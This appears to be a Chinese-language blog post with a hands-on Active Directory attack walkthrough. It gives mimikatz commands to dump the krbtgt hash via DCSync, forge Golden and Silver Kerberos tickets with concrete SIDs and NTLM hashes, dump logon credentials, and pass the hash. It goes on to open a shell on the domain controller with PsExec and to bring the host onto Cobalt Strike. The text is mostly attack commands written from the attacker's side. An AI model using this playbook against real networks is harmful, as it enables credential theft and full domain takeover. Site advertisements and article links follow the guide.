Golden Ticket
当攻击者已经拿到域控的管理权限
klist 域成员主机上执行klist,即可查看缓存的票据
klist purge 清除票据
在域渗透过程如果发现域管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改
信息搜集
域名 net time /domain ipconfig /all
伪造管理员用户名 net group "domain admins"
krbtgt账号的哈希值 mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
域的SID值(去掉最后的500) wmic useraccount get name,sid
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
利用
#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit
#pass the ticket票据传递,获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit
Silver Ticket
伪造TGS,只能访问指定的服务器
信息搜集
域名 net time /domain ipconfig /all
域的SID值(去掉最后的500) wmic useraccount get name,sid
目标机器的FQDN net time /domain 就是hostname+域名 /target:\\WIN-75NA0949GFB.NOONE.com
可利用的服务CIFS(磁盘共享的服务) /service:CIFS
要伪造的用户名 /user:Administrator
服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB$带$的hash,不是admin的) /rc4:08d93ddf15a6309a46daaa7ec8565296
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs 服务参数为cifs
/domain 参数为域名
/sid 参数为域sid (whoami /user)
/target The FDQN 指定域内的机器 /target:WIN-75NA0949GFB.NOONE.com
/rc4 服务账号的ntml hash
/user 需要伪造的用户名 NTLM Hash of User Password/Computer Password
利用
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
#伪造白银票据,伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit
dir \\WIN-75NA0949GFB.NOONE.com\c$
pass the hash
拿到本地管理员权限,如果域控的密码和web本地管理员的密码相同可用pth
#提升权限且获取hash
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
#hash传递
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
#列出域控主机C盘
dir \\WIN-75NA0949GFB.NOONE.com\c$
只看域控的C盘很没意思吧,那就来点有意思的
在受控的域成员主机上 上传PsExec.exe,进到所在目录(https://github.com/vijayphilip/PsExecRemoteWinEC2)
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe 即可反弹域控的shell
然后cs生成powershell马,使域控主机上线
注意:ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage : c000000d
经过我的一系列实验,域成员主机如果为windows xp或windows server 2003,是无法正常伪造票据的
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构